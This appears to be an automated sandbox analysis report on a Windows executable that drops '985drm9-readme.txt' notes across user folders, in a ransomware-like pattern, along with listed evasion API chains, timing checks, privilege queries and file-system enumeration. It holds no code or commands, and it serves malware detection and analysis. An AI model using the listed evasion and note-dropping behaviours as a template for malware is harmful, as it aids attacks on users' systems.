              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\downloads\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\favorites\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\links\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\music\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\onedrive\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\pictures\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\saved games\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\default\videos\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\.ms-ad\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\3d objects\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\contacts\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\downloads\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\favorites\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\links\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\music\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\onedrive\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\pictures\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\recent\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\saved games\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\searches\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\videos\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\accountpictures\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\desktop\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\documents\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\downloads\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\libraries\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\music\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\pictures\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\public\videos\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\bpmlnobvsb\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\dvwhkmnfnn\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\ltkmybseyz\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\nebfqqywps\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\onbqclyspu\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\qncycdfijj\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\ummbdneqbn\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\uoojjozirh\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\vlzdgukutz\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\xzxhavgrag\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\zbedcjpbey\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\desktop\ztgjilhxqb\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\bpmlnobvsb\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\dvwhkmnfnn\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\ltkmybseyz\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\nebfqqywps\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\onbqclyspu\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\qncycdfijj\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\ummbdneqbn\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\uoojjozirh\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\vlzdgukutz\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\xzxhavgrag\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\zbedcjpbey\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\documents\ztgjilhxqb\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\favorites\links\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\pictures\camera roll\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile created: c:\users\user\pictures\saved pictures\985drm9-readme.txtJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-3519
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D94A6C0_2_00D94A6C
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exe TID: 6236Thread sleep count: 10000 > 30Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-3742
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D949C2 rdtsc 0_2_00D949C2
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeWindow / User API: threadDelayed 10000Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-3731
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D92E6D GetSystemInfo,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,UnmapViewOfFile,DeleteFileW,0_2_00D92E6D
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D961AD FindFirstFileW,FindNextFileW,FindClose,0_2_00D961AD
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeAPI call chain: ExitProcess graph end nodegraph_0-3559
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.19041.1865_en-us_b6d4cf229ed6dfa6.manifestJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3_hidserv.dll.mui_561adfc8Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Backup\Jump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..keyhelper.resources_31bf3856ad364e35_10.0.19041.1_en-us_a9723a608a71b1eb.manifestJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeFile opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifestJump to behavior
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\r\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\f\'|Y
              Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\=
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.19041.1_none_43a9017744e82ca8\:
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.19041.1_en-us_d314f4eb3925c8b5\z
              Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2135529974.0000000003BCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\r\5
              Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.19041.1_en-us_168291f09487ebd5\q
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\r\+?Z
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.19041.1_none_b6d8bfc73f89cc96\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\r\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_50c23e4c771f203a\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062947711.0000000002586000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2062832117.0000000002593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146393174.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052813472.000000000257B000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052687517.000000000256D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113039589.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.19041.1_none_a2ace16370124ff4\{
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.19041.1_en-gb_7788797720472f2d\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\W
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.19041.1_none_d7dfb451bd621127\U
              Source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146393174.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052813472.000000000257B000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052687517.000000000256D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113039589.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_0ccb9f4751718744\BB
              Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\r\Q}+
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\r\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\r\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.19041.1_en-us_5ee8ada67d246bda\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.19041.1_en-us_b3d1ef0d088d6955\:
              Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integratioU
